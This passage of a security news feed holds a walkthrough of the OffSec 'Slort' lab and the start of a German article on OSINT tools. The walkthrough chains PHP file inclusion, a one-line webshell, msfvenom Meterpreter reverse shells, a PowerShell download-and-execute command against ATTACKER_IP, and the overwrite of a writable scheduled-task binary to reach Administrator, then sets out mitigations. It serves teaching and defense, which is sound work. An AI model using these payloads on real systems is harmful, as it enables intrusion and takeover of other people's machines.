Version<br>--------  -----  --------  -------------------------------------------------<br>21/tcp    open   FTP       FileZilla 0.9.41 beta<br>135/tcp   open   msrpc     Microsoft Windows RPC<br>139/tcp   open   netbios   Microsoft Windows netbios-ssn<br>445/tcp   open   SMB       Microsoft Windows SMB (signing not required)<br>3306/tcp  open   mysql     MariaDB — unauthorized (local connections only)<br>8080/tcp  open   HTTP      Apache 2.4.43, PHP 7.4.6, OpenSSL 1.1.1g (Win64 XAMPP)</pre><p>The port 8080 finding is the most significant. XAMPP is a self-contained PHP development stack — the combination of Apache, PHP, MySQL, and sometimes phpMyAdmin — and old versions are known to ship with dangerous default settings, such as allow_url_include enabled. MariaDB is reachable on 3306, but the banner says "host not allowed", meaning it is accepting local connections only. SMB message signing is not required, which is noted for completeness. FTP is running a very old FileZilla beta — worth probing for anonymous login before moving on.</p><h3>1.2 Nmap Port Scan — Full Range</h3><pre>nmap -Pn -p- --min-rate 5000 &lt;TARGET_IP&gt;</pre><p><strong>Additional ports found:</strong></p><pre>49665/tcp  open  msrpc<br>49666/tcp  open  msrpc</pre><p>Both are ephemeral Windows RPC ports assigned dynamically at startup. They provide no additional attack surface here. The full scan confirms that the fast pass covered the meaningful services.</p><h3>1.3 Dead-End Service Checks</h3><p>Three quick checks before committing to the web server:</p><pre>ftp &lt;TARGET_IP&gt;<br># Username: anonymous<br># Password: anonymous</pre><p>Anonymous FTP login was rejected. FileZilla 0.9.41 beta is an old version, but anonymous access was not enabled on this instance.</p><pre>smbclient -L //&lt;TARGET_IP&gt; -N</pre><pre>NT_STATUS_ACCESS_DENIED</pre><p>Null session authentication is blocked. No SMB shares are enumerable without credentials.</p><pre>mysql -h &lt;TARGET_IP&gt; -u root --password=''</pre><p>Connection refused — MariaDB is bound to localhost only, consistent with the Nmap banner. XAMPP’s default MariaDB configuration does not expose the database externally, and that default was not changed here.</p><p>All three dead ends confirmed in under two minutes. Port 8080 is the target.</p><h3>2. Web Enumeration</h3><h3>2.1 Directory Busting — Port 8080</h3><pre>ffuf -u http://&lt;TARGET_IP&gt;:8080/FUZZ \<br>     -w /usr/share/seclists/Discovery/Web-Content/common.txt \<br>     -mc 200,301,302,403 -t 40</pre><p><strong>Results:</strong></p><pre>Path          Status  Notes<br>-----------   ------  ----------------------------------------<br>/site         301     Custom application<br>/phpmyadmin   403     Installed but access restricted<br>/dashboard    301     Default XAMPP dashboard</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/988/1*A00HueMeJfRO72kWjG5VJA.png"></figure><p>/site/ is the non-standard result. phpMyAdmin is present and blocked from external access — a useful note if credentials surface later. The XAMPP dashboard is the default content. Everything that matters is in /site/.</p><h3>2.2 Enumerating /site/</h3><pre>ffuf -u http://&lt;TARGET_IP&gt;:8080/site/FUZZ \<br>     -w /usr/share/seclists/Discovery/Web-Content/common.txt \<br>     -mc 200,301,302,403 -t 40</pre><p><strong>Results:</strong></p><pre>Path        Status  Size   Notes<br>----------  ------  -----  ------------------------------------------<br>admin.php   200     3998   Present<br>controllers 200     984    Application MVC structure<br>css         301     —      Static assets<br>fonts       301     —      Static assets<br>images      301     —      Static assets<br>index.php   301     27     Tiny body — redirect script<br>js          301     —      Static assets</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/919/1*yqYhMYXjCEv4psp5eszy9g.png"></figure><p>index.php returning a 301 with only 27 bytes in the response body is the key finding. That response size is consistent with a PHP script containing nothing but a header("Location: ...") redirect — the entire file is a single redirect, and it is almost certainly redirecting to itself with a ?page= parameter appended. That is the classic signature of a file inclusion handler.</p><h3>2.3 Identifying the File Inclusion Parameter</h3><pre>curl -I http://&lt;TARGET_IP&gt;:8080/site/index.php</pre><p><strong>Response header:</strong></p><pre>HTTP/1.1 301 Moved Permanently<br>Location: index.php?page=main.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/830/1*rbGwMu5xXqNP57_HpxpBSA.png"></figure><p>Confirmed. The application uses ?page= to determine which PHP file to include. The redirect destination is main.php, meaning the application's logic is to include whatever file is named in the page parameter. If that parameter is passed unsanitised into PHP's include(), it is a file inclusion vulnerability. The next step is confirming how far it can be pushed.</p><h3>3. Initial Access — RFI via PHP allow_url_include</h3><h3>3.1 Confirming LFI via Path Traversal</h3><pre>curl "http://&lt;TARGET_IP&gt;:8080/site/index.php?page=../../../../windows/system32/drivers/etc/hosts"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/918/1*afnt8HGDVvqAaOwZaahBMw.png"></figure><p><strong>Output:</strong> The Windows hosts file content was returned verbatim in the response body.</p><p>LFI is confirmed. The application passes $_GET['page'] directly into include() with no path restriction and no input sanitisation. The web root sits at C:\xampp\htdocs\site\, so four levels of ../ traversal climb to the filesystem root, and the hosts file path resolves cleanly from there.</p><p>LFI alone enables arbitrary file reads — configuration files, credential stores, source code. The more powerful technique is RFI: if PHP’s allow_url_include directive is enabled, include() can fetch and execute code from a remote URL entirely under attacker control.</p><h3>3.2 Confirming RFI and Deploying a PHP Webshell</h3><p>Create a minimal PHP webshell locally:</p><pre>echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; ~/cmd.php</pre><p>Serve it over HTTP from the attacker's machine:</p><pre>python3 -m http.server 8000</pre><p>Trigger remote inclusion and confirm RCE:</p><pre>curl "http://&lt;TARGET_IP&gt;:8080/site/index.php?page=http://&lt;ATTACKER_IP&gt;:8000/cmd.php&amp;cmd=whoami"</pre><p><strong>Output:</strong></p><pre>slort\rupert</pre><p>RFI confirmed. allow_url_include is enabled on this XAMPP installation. PHP fetched cmd.php from the attacker's machine, executed it as server-side code, and ran whoami via system(), and returned the result. Remote code execution as rupert is established.</p><blockquote><em>💡 </em><em>allow_url_include was deprecated in PHP 7.4 and removed in PHP 8.0. Its presence here on PHP 7.4.6 confirms this is an unmaintained, default XAMPP installation where the dangerous default was never corrected.</em></blockquote><h3>3.3 Upgrading to an Interactive Meterpreter Session</h3><p>A webshell requires a separate HTTP request for every command and leaves a log entry for every action. An interactive reverse shell provides a persistent, stateful terminal session.</p><p>Generate a stageless Windows Meterpreter payload:</p><pre>msfvenom -p windows/x64/meterpreter_reverse_tcp \<br>     LHOST=&lt;ATTACKER_IP&gt; LPORT=4444 \<br>     -f exe -o shell.exe</pre><p>A <strong>stageless</strong> payload (meterpreter_reverse_tcp) embeds the full Meterpreter agent in a single executable. A <strong>staged</strong> payload (meterpreter/reverse_tcp) sends a small stager first, which then downloads the agent in a second connection. Stageless is more reliable — one connection, full functionality from the moment it lands. If the second connection of a staged payload is interrupted by a firewall or timing issue, the session is lost.</p><p>Serve the payload and set up the Metasploit handler:</p><pre># Metasploit handler<br>use exploit/multi/handler<br>set payload windows/x64/meterpreter_reverse_tcp<br>set LHOST &lt;ATTACKER_IP&gt;<br>set LPORT 4444<br>run</pre><p>Deliver the payload via the webshell using a base64-encoded PowerShell command. Base64 encoding the entire PowerShell command with -enc sidesteps character escaping issues that arise when special characters — quotes, semicolons, dollar signs, pipes — must survive intact through URL encoding, PHP's system(), and PowerShell's own parser. A single base64 token collapses all of that complexity.</p><pre># Generate the base64-encoded download-and-execute command<br>powershell -c "IEX((New-Object Net.WebClient).DownloadString('http://&lt;ATTACKER_IP&gt;:8000/shell.exe'))"<br># Base64-encode the above in UTF-16LE for PowerShell -enc</pre><p>Trigger via the webshell:</p><pre>curl "http://&lt;TARGET_IP&gt;:8080/site/index.php?page=http://&lt;ATTACKER_IP&gt;:8000/cmd.php&amp;cmd=powershell+-enc+&lt;BASE64_PAYLOAD&gt;"</pre><p><strong>Meterpreter session received:</strong></p><pre>meterpreter &gt; getuid<br>Server username: SLORT\rupert</pre><p>Interactive session as rupert. Standard post-exploitation enumeration follows.</p><h3>4. Post-Exploitation Enumeration</h3><h3>4.1 Token Privileges</h3><pre>whoami /priv</pre><p>Only default low-privilege user rights are present. There is no SeImpersonatePrivilege, SeDebugPrivilege, or SeBackupPrivilege. The fast paths — PrintSpoofer, GodPotato, or token impersonation attacks — are not available here.</p><h3>4.2 Group Membership</h3><pre>whoami /groups</pre><p>rupert is a member of the standard user groups only: Everyone, Users, and Authenticated Users. No Administrators, Backup Operators, Remote Management Users, or Remote Desktop Users membership. No group-based escalation path.</p><h3>4.3 Auto-Starting Services</h3><pre>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"</pre><p>Only VMware Tools services returned, all with properly quoted executable paths. No unquoted service path vulnerabilities, and no third-party service binaries to check for weak ACLs.</p><h3>4.4 Scheduled Tasks</h3><pre>schtasks /query /fo LIST /v | findstr /i "task name\|run as\|status"</pre><p>Only standard Windows system maintenance tasks. No custom tasks with writable executables or elevated execution contexts visible through automated enumeration.</p><h3>4.5 Registry Run Keys</h3><pre>reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run<br>reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><p>Only VMware Tools and Windows Security Health entries in both keys. No custom or administrator-added run key entries.</p><h3>4.6 Manual Filesystem Exploration — C:\Backup</h3><p>Automated enumeration produced nothing. Manual exploration of non-standard directories is the next step — anything outside C:\Windows\ and C:\Program Files\ that an administrator created deliberately is worth reading.</p><pre>dir C:\Backup</pre><pre>TFTP.EXE<br>info.txt</pre><pre>type C:\Backup\info.txt</pre><p><strong>Output:</strong></p><pre>Run every 5 minutes:<br>C:\Backup\TFTP.EXE -i &lt;REMOTE_HOST&gt; get backup.txt</pre><p>A scheduled task invoking TFTP.EXE on a five-minute interval to pull a backup file from a remote host. Two questions determine whether this is exploitable: what account runs this task, and whether the binary is writable by rupert?</p><blockquote><em>💡 Automated scripts follow predefined patterns. </em><em>C:\Backup is not part of any default Windows installation — an administrator created it and placed files there deliberately. Non-standard directories created by administrators are consistently worth manual inspection.</em></blockquote><h3>5. Privilege Escalation — Writable Scheduled Task Binary</h3><h3>5.1 Confirming Write Access with icacls</h3><pre>icacls C:\Backup\TFTP.EXE</pre><p><strong>Output:</strong></p><pre>C:\Backup\TFTP.EXE  BUILTIN\Users:(I)(F)<br>                    NT AUTHORITY\SYSTEM:(I)(F)<br>                    BUILTIN\Administrators:(I)(F)</pre><p>BUILTIN\Users:(I)(F) — Every authenticated user on the system has inherited full control over this file. (F) means full control: read, write, execute, delete, and permission modification. (I) means the permission was inherited from the parent directory's ACL rather than set explicitly on the file itself. rupert is a member of BUILTIN\Users. The binary can be overwritten entirely.</p><p>The account that runs the scheduled task is Administrator. Replacing the binary with a Meterpreter payload means the next time the scheduler fires, it executes the payload as Administrator — a direct path to a privileged session.</p><h3>5.2 Generating the Replacement Payload</h3><pre>msfvenom -p windows/x64/meterpreter_reverse_tcp \<br>     LHOST=&lt;ATTACKER_IP&gt; LPORT=7777 \<br>     -f exe -o tftp.exe</pre><p>Port 7777 is used to keep this listener separate from the existing session on port 4444. The output file is named tftp.exe to match the original binary — while the filename does not affect execution, it keeps the operation clean and avoids any hypothetical filename-based integrity checks.</p><p>Set up a second Metasploit handler:</p><pre>use exploit/multi/handler<br>set payload windows/x64/meterpreter_reverse_tcp<br>set LHOST &lt;ATTACKER_IP&gt;<br>set LPORT 7777<br>run</pre><h3>5.3 Overwriting TFTP.EXE</h3><p>From the existing rupert Meterpreter session, download the payload directly to the target path using PowerShell's DownloadFile method:</p><pre>powershell -c "(New-Object Net.WebClient).DownloadFile('http://&lt;ATTACKER_IP&gt;:8000/tftp.exe','C:\Backup\TFTP.EXE')"</pre><p>DownloadFile writes the file to an exact specified path, making it more reliable than certutil for overwriting an existing binary at a known location.</p><p>The overwrite succeeds. The original TFTP.EXE was not locked by any running process — it executes briefly when the scheduler fires and exits immediately. With no active file lock, the binary can be replaced cleanly between scheduler invocations.</p><h3>5.4 Catching the Administrator Session</h3><p>Wait for the five-minute scheduled task cycle to complete. The scheduler invokes C:\Backup\TFTP.EXE under the Administrator account. The payload executes and connects back to the second Meterpreter handler.</p><p><strong>Session received:</strong></p><pre>meterpreter &gt; getuid<br>Server username: SLORT\Administrator</pre><p>Administrator.</p><h3>6. Proof of Compromise</h3><pre>meterpreter &gt; getuid<br>Server username: SLORT\Administrator</pre><h3>7. Vulnerability Summary</h3><pre>#   Vulnerability                                        Severity   Impact<br>--  ---------------------------------------------------  ---------  -----------------------------------------------<br>1   PHP allow_url_include enabled on XAMPP               Critical   Remote file inclusion enabling arbitrary RCE<br>2   User input passed to include() without sanitisation  Critical   LFI and RFI via ?page= parameter<br>3   TFTP.EXE world-writable by BUILTIN\Users             Critical   Scheduled task binary replaced — Admin session</pre><h3>8. Defense &amp; Mitigation</h3><h3>8.1 Remote File Inclusion — PHP allow_url_include Enabled</h3><p><strong>Root Cause:</strong> PHP’s allow_url_include directive was enabled in the XAMPP php.ini configuration. This setting permits include() and require() to accept full URLs as arguments, causing PHP to fetch and execute remote files as server-side code. Combined with unsanitised user input in the page parameter, this enabled complete remote code execution.</p><p><strong>Mitigations:</strong></p><ul><li><strong>Disable </strong><strong>allow_url_include immediately and permanently.</strong> There is no legitimate production use case for this setting that cannot be achieved safely through other means. Set it to Off in php.ini:</li></ul><pre>allow_url_include = Off</pre><ul><li>Restart Apache after the change:</li></ul><pre># Linux<br>  systemctl restart apache2<br>  # Windows (XAMPP)<br>  # Use the XAMPP Control Panel or: net stop Apache2.4 &amp;&amp; net start Apache2.4</pre><ul><li><strong>Disable </strong><strong>allow_url_fopen as well, where external URL fetching is not required.</strong> This setting controls whether PHP's file functions can open remote URLs at all. Disabling it eliminates the underlying network fetch capability:</li></ul><pre>allow_url_fopen = Off</pre><ul><li><strong>Keep PHP up to date.</strong> allow_url_include was deprecated in PHP 7.4 and removed entirely in PHP 8.0. Upgrading to a supported PHP 8.x release eliminates the setting as a risk entirely. Running PHP 7.4 on a XAMPP installation in a production or lab context is indefensible — it receives no security patches.</li><li><strong>Harden XAMPP for any network-accessible deployment.</strong> XAMPP is a development stack. Its default configuration — allow_url_include on, phpMyAdmin accessible, MariaDB with no root password — is intentionally permissive for local development. Any XAMPP instance reachable from a network should be hardened against these defaults before use.</li></ul><h3>8.2 User Input Passed to include() Without Sanitisation</h3><p><strong>Root Cause:</strong> The index.php application passed $_GET['page'] directly into PHP's include() function. Any value — a relative path, an absolute path, or a full URL — was accepted and executed without validation, restriction, or sanitisation.</p><p><strong>Mitigations:</strong></p><ul><li><strong>Never pass user-controlled input directly to </strong><strong>include(), </strong><strong>require(), or any file system function.</strong> This is a fundamental PHP security principle. If dynamic page loading is a genuine application requirement, it must be implemented through a strict allowlist — only known, pre-approved values should ever reach a file inclusion call:</li></ul><pre>$allowed_pages = [<br>      'home'  =&gt; 'home.php',<br>      'about' =&gt; 'about.php',<br>      'store' =&gt; 'store.php',<br>  ];<br>  $page = $allowed_pages[$_GET['page']] ?? 'home.php';<br>  include($page);</pre><ul><li>Any value not in the $allowed_pages array silently falls back to the default. An attacker passing a path traversal sequence or a remote URL receives the home page — nothing executes, nothing is disclosed.</li><li><strong>Set </strong><strong>open_basedir in </strong><strong>php.ini to restrict which directories PHP can access.</strong> Even if LFI is exploited, open_basedir confines file access to a specified directory tree and prevents reading files outside of it:</li></ul><pre>open_basedir = C:/xampp/htdocs/site/</pre><ul><li><strong>Conduct a source code review for all </strong><strong>include() and </strong><strong>require() calls.</strong> Every call to these functions in the codebase should be audited. Any that accepts external input without allowlist validation is a vulnerability. This is a straightforward static analysis task that should be part of any application security review.</li><li><strong>Use a Web Application Firewall as a compensating control.</strong> ModSecurity with the OWASP Core Rule Set detects path traversal sequences and remote URL patterns in parameters. It does not replace fixing the root cause, but it adds a meaningful detection and blocking layer.</li></ul><h3>8.3 World-Writable Scheduled Task Binary</h3><p><strong>Root Cause:</strong> C:\Backup\TFTP.EXE inherited (F) — full control — from the parent directory's ACL for BUILTIN\Users. Every authenticated user on the system could overwrite the binary. The scheduled task ran the binary as Administrator on a five-minute cycle. Any attacker with a low-privilege session could replace the binary and wait for the scheduler to provide an Administrator callback.</p><p><strong>Mitigations:</strong></p><ul><li><strong>Remove write permissions for </strong><strong>BUILTIN\Users from any executable invoked by a privileged scheduled task or service.</strong> The binary should be readable and executable by the account running the task, and writable only by Administrators or SYSTEM. Correct the ACL immediately:</li></ul><pre>icacls C:\Backup\TFTP.EXE /remove:g "BUILTIN\Users"<br>  icacls C:\Backup\TFTP.EXE /grant:r "BUILTIN\Users:(RX)"<br>  icacls C:\Backup\TFTP.EXE /grant:r "NT AUTHORITY\SYSTEM:(F)"<br>  icacls C:\Backup\TFTP.EXE /grant:r "BUILTIN\Administrators:(F)"</pre><ul><li><strong>Apply the principle of least privilege to all scheduled task executables and service binaries.</strong> The rule is simple: an account that does not need to modify a binary must not have write access to it, regardless of what inherited permissions the parent directory grants. Audit all scheduled tasks and services regularly:</li></ul><pre>icacls C:\Path\To\TaskExecutable.exe</pre><ul><li>Any result showing (F), (M), or (W) for BUILTIN\Users, Everyone, or Authenticated Users is a critical finding.</li><li><strong>Review the ACL of the parent directory, not just the binary.</strong> The inherited permissions here originated from C:\Backup\ itself. Fixing the directory ACL prevents future executables placed there from inheriting the same dangerous permissions:</li></ul><pre>icacls C:\Backup /inheritance:r<br>  icacls C:\Backup /grant:r "NT AUTHORITY\SYSTEM:(OI)(CI)(F)"<br>  icacls C:\Backup /grant:r "BUILTIN\Administrators:(OI)(CI)(F)"</pre><ul><li><strong>Store scheduled task executables in root-owned, permission-restricted directories.</strong> System utilities and automation scripts used by privileged tasks belong in C:\Windows\System32\, C:\Program Files\, or a custom directory with a deliberately hardened ACL — not in a general-purpose directory like C:\Backup\ where default permissions may be overly permissive.</li><li><strong>Log and alert on modifications to scheduled task executables.</strong> Windows Event ID 4663 (file accessed) and 4670 (permissions changed) can be monitored via Windows Security Auditing or a SIEM. Any write to an executable invoked by a privileged scheduled task should generate an immediate alert:</li></ul><pre>auditpol /set /subcategory:"File System" /success:enable /failure:enable</pre><ul><li><strong>Apply File Integrity Monitoring to critical executables.</strong> Tools such as OSSEC, Wazuh, or Tripwire can monitor specified files for modification and alert in real time. C:\Backup\TFTP.EXE being overwritten between scheduler invocations would have generated an immediate alert with FIM in place.</li></ul><p><em>OffSec PG Play — for educational purposes only.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=ac72c40761ae" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/slort-rfi-via-php-allow-url-include-writable-scheduled-task-binary-to-administrator-offsec-pg-ac72c40761ae">Slort — RFI via PHP allow_url_include + Writable Scheduled Task Binary to Administrator | OffSec PG…</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Open Source Intelligence: Die besten OSINT Tools]]></title>
<description><![CDATA[Open Source Intelligence Tools finden frei verfügbare Informationen. Die können kriminelle Hacker für ihre Zwecke nutzen – es sei denn, Sie kommen ihnen zuvor.
					Foto: GaudiLab – shutterstock.com




In den 1980er Jahren vollzog sich im Bereich der Militär- und Geheimdienste ein Paradigmenwech...]]></description>
<link>https://tsecurity.de/de/3603509/it-security-nachrichten/open-source-intelligence-die-besten-osint-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603509/it-security-nachrichten/open-source-intelligence-die-besten-osint-tools/</guid>
<pubDate>Wed, 17 Jun 2026 05:23:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Open Source Intelligence Tools finden frei verfügbare Informationen. Die können kriminelle Hacker für ihre Zwecke nutzen - es sei denn, Sie kommen ihnen zuvor." title="Open Source Intelligence Tools finden frei verfügbare Informationen. Die können kriminelle Hacker für ihre Zwecke nutzen - es sei denn, Sie kommen ihnen zuvor." src="https://images.computerwoche.de/bdb/3337194/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Open Source Intelligence Tools finden frei verfügbare Informationen. Die können kriminelle Hacker für ihre Zwecke nutzen – es sei denn, Sie kommen ihnen zuvor.</p></figcaption></figure><p class="imageCredit">
					Foto: GaudiLab – shutterstock.com</p></div>




<p>In den 1980er Jahren vollzog sich im Bereich der Militär- und <a href="https://www.computerwoche.de/article/2794117/skandal-um-crypto-ag-ueberschattete-sicherheitskonferenz.html" title="Geheimdienste" target="_blank">Geheimdienste</a> ein Paradigmenwechsel. Klassische Aktivitäten wie das Abfangen von Briefen und Abhören von Telefongesprächen wurden von einem neuen Trend zur Geheimnisausspähung abgelöst: Dabei konzentrierten sich Agenten darauf, frei verfügbare oder offiziell veröffentlichte Informationen für ihre Zwecke zu nutzen. Es war eine andere Welt, die ohne <a href="https://www.computerwoche.de/enterprise-applications/" target="_blank" class="idgGlossaryLink">Social Media</a> auskommen musste. Stattdessen waren Zeitungen und öffentlich verfügbare Datenbanken die Hauptquellen für interessante und/oder nützliche Informationen. </p>



<h2 class="wp-block-heading">OSINT – Definition</h2>



<p>Das hört sich simpel an, erforderte in der Praxis allerdings ein Höchstmaß an Kombinationsfähigkeit, um relevante Informationen zuverlässig miteinander zu verknüpfen und daraus ein Lagebild zu erstellen. Diese Art der Spionage bezeichnete man als <a href="https://de.wikipedia.org/wiki/Open_Source_Intelligence" title="Open Source Intelligence (OSINT)" target="_blank" rel="noopener">Open Source Intelligence (OSINT)</a>.</p>



<p>Die OSINT-Taktik kann heute auch auf das Gebiet der Cybersecurity <a href="https://www.computerwoche.de/article/2794912/so-funktioniert-social-engineering.html" title="angewandt werden" target="_blank">angewandt werden</a>. Denn die meisten Unternehmen und Organisationen verfügen über eine ausgedehnte, in weiten Teilen öffentlich zugängliche Infrastruktur, die diverse Netzwerke, Technologien, Hosting Services und Namespaces umfasst. Informationen beziehungsweise Daten können sich dabei auf diversen Geräten befinden – den Rechnern von Mitarbeitern, On-Premises Servern, privaten Devices von Mitarbeitern (im Sinne von “Bring your own Device”), Cloud-Instanzen oder auch dem Quellcode von aktiven Applikationen.</p>



<p>Tatsächlich weiß die IT-Abteilung in Großunternehmen in der Praxis so gut wie nie über alle Assets im Unternehmen Bescheid – ob öffentlich zugänglich oder nicht. Dazu gesellt sich der Umstand, dass die meisten Unternehmen auch verschiedene zusätzliche Assets indirekt verwalten – etwa ihre <a href="https://www.computerwoche.de/enterprise-applications/" target="_blank" class="idgGlossaryLink">Social Media</a> Accounts. Gerade in diesem Bereich werden oft Informationen vorgehalten, die gefährlich werden könnten, falls sie <a href="https://www.computerwoche.de/article/2794098/so-stehlen-hacker-ihre-handynummer.html" title="in falsche Hände geraten" target="_blank">in falsche Hände geraten</a>.</p>



<p>An dieser Stelle kommt die aktuelle Generation der Open Source Intelligence Tools ins Spiel. Die OSINT-Werkzeuge übernehmen im Wesentlichen drei Funktionen:</p>



<ol class="wp-block-list">
<li><p><strong>Öffentlich zugängliche Assets aufspüren:</strong> Die gängigste Funktion von OSINT Tools ist es, IT-Teams dabei zu unterstützen, öffentlich zugängliche Assets und die darin enthaltenen Informationen zu ermitteln. Dabei geht es insbesondere um Daten, die potenziell zur Erschließung von Angriffsvektoren beitragen könnten. Damit ist jedoch nicht die Ermittlung von <a title="Sicherheitslücken" href="https://www.computerwoche.de/article/2792554/wie-ihre-software-sicher-wird.html" target="_blank">Sicherheitslücken</a> oder Penetration Testing gemeint – es geht ausschließlich um Informationen, die ohne den Einsatz von Hacking-Methoden zugänglich sind.</p></li>



<li><p><strong>Relevante Informationen außerhalb der Organisation finden:</strong> Eine weitere Funktion von Open Source Intelligence Tools liegt darin, Informationen aufzuspüren, die sich außerhalb der eigenen Organisation befinden – also etwa auf Social-Media-Plattformen oder Domains. Dieses Feature dürfte insbesondere für Großunternehmen interessant sein, die im Rahmen von Firmenübernahmen neue IT Assets integrieren. Angesichts des extremen Wachstums von Social-Media-Plattformen ist die Überprüfung auf <a title="sensible Informationen außerhalb der Unternehmensgrenzen" href="https://www.computerwoche.de/article/2780856/social-engineering-angriffe-erkennen-und-verhindern.html" target="_blank">sensible Informationen außerhalb der Unternehmensgrenzen</a> für jede Organisation sinnvoll.</p></li>



<li><p><strong>Ermittelte Informationen verwertbar zusammenstellen:</strong> Einige OSINT Tools sind in der Lage, gesammelte Informationen und Daten in verwertbarer Form zusammenzufassen. Ein OSINT Scan kann im Fall eines Großunternehmens hunderttausende von Ergebnissen aufwerfen – insbesondere, wenn sowohl interne als auch externe Quellen miteinfließen. Die Daten zu strukturieren und die drängendsten Probleme zuerst anzugehen, ist nicht nur in solchen Fällen hilfreich.</p></li>
</ol>



<h2 class="wp-block-heading">Open Source Intelligence – die besten Tools</h2>



<p>Indem sie Informationen über Ihr Unternehmen, Ihre Mitarbeiter, Ihre IT Assets oder andere sensible Daten zu Tage fördern, die von böswilligen Angreifern ausgenutzt werden könnten, können geeignete Open Source Intelligence Tools dazu beitragen, Ihr <a title="IT-Security-Niveau" href="https://www.computerwoche.de/article/2792337/cyberrisiken-muessen-in-der-chefetage-geloest-werden.html" target="_blank">IT-Security-Niveau</a> zu erhöhen: Wenn Sie solche Informationen vor den Angreifern finden, können Sie die Gefahr böswilliger Aktivitäten – von <a title="Phishing" href="https://www.computerwoche.de/article/2766868/erkennen-sie-internetbetrug.html" target="_blank">Phishing</a>– bis hin zu <a title="Denial-of-Service-Attacken" href="https://www.computerwoche.de/article/2792724/warum-ddos-attacken-immer-gefaehrlicher-werden.html" target="_blank">Denial-of-Service-Attacken</a> – deutlich reduzieren. Im Folgenden stellen wir Ihnen einige der besten Open Source Intelligence Tools sowie deren individuelle Stärken vor.</p>



<p><a href="https://www.maltego.com/" target="_blank" rel="noreferrer noopener"><strong>Maltego</strong></a></p>



<p>Dieses OSINT Tool ist darauf ausgelegt, Beziehungsgeflechte zwischen Menschen, Unternehmen, Domains und öffentlich zugänglichen Informationen im World Wide Web offenzulegen. Die Ergebnisse visualisiert Maltego in Form ansprechender Grafiken und Diagramme, in die bis zu 10.000 Datenpunkte einfließen können. Maltego durchsucht auf Knopfdruck automatisiert verschiedene öffentliche Datenquellen. Dazu gehören etwa DNS-Abfragen, Suchmaschinen und soziale Netzwerke. Kompatibel ist das Tool mit nahezu jeder Datenquelle, die ein öffentlich zugängliches Interface aufweist.</p>



<p>Ist die Informationssammlung abgeschlossen, verknüpft das OSINT Tool die Daten und gibt Auskunft über die verborgenen Relationen zwischen Namen, E-Mail-Adressen, Unternehmen, Webseiten und anderen Informationen. Weil Maltego auf <a href="https://www.computerwoche.de/article/2794625/was-javascript-von-typescript-unterscheidet.html" title="Java-Basis" target="_blank">Java-Basis</a> entstanden ist, läuft es zuverlässig auf <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-, Mac- und <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Linux</a>-Plattformen.</p>



<p>Maltego steht in einer kostenfreien Version mit eingeschränkten Funktionen zur Verfügung. Die “Entry”-Version kostet 3.000 Euro pro Jahr, das “Professional”-Abo jährlich 7.500 Euro. Eine Enterprise-Version steht auf Anfrage ebenfalls zur Verfügung. </p>



<p><a href="https://github.com/lanmaster53/recon-ng" target="_blank" rel="noreferrer noopener"><strong>Recon-ng</strong></a></p>



<p>Softwareentwickler die mit Python arbeiten, steht mit <a href="https://github.com/lanmaster53/recon-ng" title="Recon-ng" target="_blank" rel="noopener">Recon-ng</a> ein vielschichtiges OSINT Tool zur Verfügung. Das Interface ähnelt <a href="https://www.csoonline.com/article/567067/what-is-metasploit-and-how-to-use-this-popular-hacking-tool.html" title="Metasploit" target="_blank">Metasploit</a>, was die Lernkurve für erfahrene Nutzer des populären Frameworks deutlich absenkt. Dank einer interaktiven Hilfefunktion (was vielen Python-Modulen fehlt) können Developer quasi direkt mit der Arbeit loslegen.</p>



<p>Die beinhaltet im Fall von Recon-ng die automatisierte Abarbeitung zeitintensiver und repetitiver OSINT Tasks (etwa Copy-und-Paste-Marathons). Das schafft mehr Zeit für die Dinge, die manuell erledigt werden müssen. Damit auch <a href="https://www.computerwoche.de/article/2762025/python-lernen-leicht-gemacht.html" title="Python-Anfänger" target="_blank">Python-Anfänger</a> mit Recon-ng zurechtkommen, verfügt das OSINT Tool über ein modulares Framework mit zahlreichen integrierten Funktionalitäten. Dazu gehören beispielsweise gängige Aufgaben wie die Standardisierung von Output, die Interaktion mit Datenbanken, das Anstoßen von Web Requests oder API Key Management. Statt Recon-ng aufwändig zu programmieren, suchen sich die Entwickler einfach die Funktionen aus, die sie benötigen und stellen so in nur wenigen Minuten ein automatisiertes Modul zusammen.</p>



<p>Bei Recon-ng handelt es sich um kostenlose, quelloffene Software.</p>



<p><a href="https://github.com/laramies/theHarvester" target="_blank" rel="noreferrer noopener"><strong>theHarvester</strong></a></p>



<p>In Sachen Nutzung ist <a href="https://github.com/laramies/theHarvester" title="theHarvester" target="_blank" rel="noopener">theHarvester</a> eines der simpelsten OSINT Tools in dieser Übersicht. Das Werkzeug ist darauf ausgelegt, Informationen außerhalb des eigenen Netzwerks von Organisationen und Unternehmen aufzuspüren. Zwar kann theHarvester auch eingesetzt werden, um interne Netzwerke auf Informationen zu durchsuchen, der Schwerpunkt liegt jedoch auf externen Daten.</p>



